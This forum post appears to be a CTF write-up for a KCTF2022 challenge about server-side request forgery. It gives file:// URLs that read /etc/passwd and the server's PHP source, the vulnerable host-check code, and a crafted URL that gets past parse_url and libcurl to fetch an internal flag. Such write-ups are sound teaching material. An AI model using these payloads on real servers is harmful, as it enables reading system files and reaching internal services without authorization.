-
-
[原创]KCTF2022 Q1 第四题 飞蛾扑火
-
发表于: 2022-5-16 22:41 8977
-
考点:ssrf & url bypass
看到phpinfo.php
和url.php
想到ssrf
file协议:http://121.36.145.157:8044/url.php?url=file://127.0.0.1/etc/passwd
能读取到passwd
读取下url.php
主干
需要绕过parse_url和libcurl
构造url:http://121.36.145.157:8044/url.php?url=123.57.254.42://ctf.pediy.com/../flag.php
得到flag:flag{xxx_999()xx*@eeEEE}
<html>
<head>
<meta charset
=
"utf-8"
>
<title>欢迎挑战 Design by 香草<
/
title>
<
/
head>
<body>
<!
-
-
phpinfo.php
-
-
>
<img src
=
"url.php?url=https://ctf.pediy.com/upload/team/762/team236762.png"
>
<
/
body>
<
/
html>
<html>
<head>
<meta charset
=
"utf-8"
>
<title>欢迎挑战 Design by 香草<
/
title>
<
/
head>
<body>
<!
-
-
phpinfo.php
-
-
>
<img src
=
"url.php?url=https://ctf.pediy.com/upload/team/762/team236762.png"
>
<
/
body>
<
/
html>
curl http:
/
/
121.36
.
145.157
:
8044
/
url.php?url
=
file
:
/
/
127.0
.
0.1
/
var
/
www
/
html
/
url.php
curl http:
/
/
121.36
.
145.157
:
8044
/
url.php?url
=
file
:
/
/
127.0
.
0.1
/
var
/
www
/
html
/
url.php
$url
=
$_GET[
"url"
];
$uu
=
parse_url($url);
$host
=
isset($uu[
"host"
])?$uu[
"host"
]:"";
$scheme
=
isset($uu[
"scheme"
])?$uu[
"scheme"
]:"";
if
(empty($host)){
die(
"host is null"
);
}
if
(empty($scheme)){
die(
"scheme is null"
);
}
/
/
https:
/
/
ctf.pediy.com
/
upload
/
team
/
762
/
team236762.png?
if
($host
=
=
"ctf.pediy.com"
||$host
=
=
"127.0.0.1"
||$host
=
=
"localhost"
){
/
/
echo curl_request(
"http://123.57.254.42/flag.php"
,
"get"
,[],true,
5
);
/
/
get flag
echo curl_request($url,'',
"get"
,[],true,
5
);
}
else
{
die(
"host not allow"
);
}
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
赞赏
他的文章
- [原创] Go AST 浅析 8648
- [原创]KCTF2022 Q1 第四题 飞蛾扑火 8978
- KCTF2022 Q1 第三题 石像病毒 6737
- [原创]KCTF2022 Q1签到题 险象环生 2522
- [原创] KCTF2021秋季赛 声名远扬 16341
看原图
赞赏
雪币:
留言: